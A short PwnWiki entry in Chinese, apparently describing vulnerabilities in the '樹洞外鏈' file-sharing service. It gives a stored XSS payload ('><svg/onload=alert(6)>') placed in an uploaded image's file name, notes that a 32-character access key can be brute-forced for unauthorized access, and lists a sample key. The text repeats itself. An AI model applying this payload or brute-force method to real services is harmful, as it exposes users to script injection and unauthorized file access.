樹洞外鏈XSS&越權漏洞
From PwnWiki
XSS
><svg/onload=alert(6)>
上傳一張圖片,在創建文件名添加xss,公開是分享文件廣場。
越權漏洞
條件,可以爆破。32位隨機字符 需要key值。
c74bffaa1cd2a4eda30bd72fe5453bb0
><svg/onload=alert(6)>
上傳一張圖片,在創建文件名添加xss,公開是分享文件廣場。
條件,可以爆破。32位隨機字符 需要key值。
c74bffaa1cd2a4eda30bd72fe5453bb0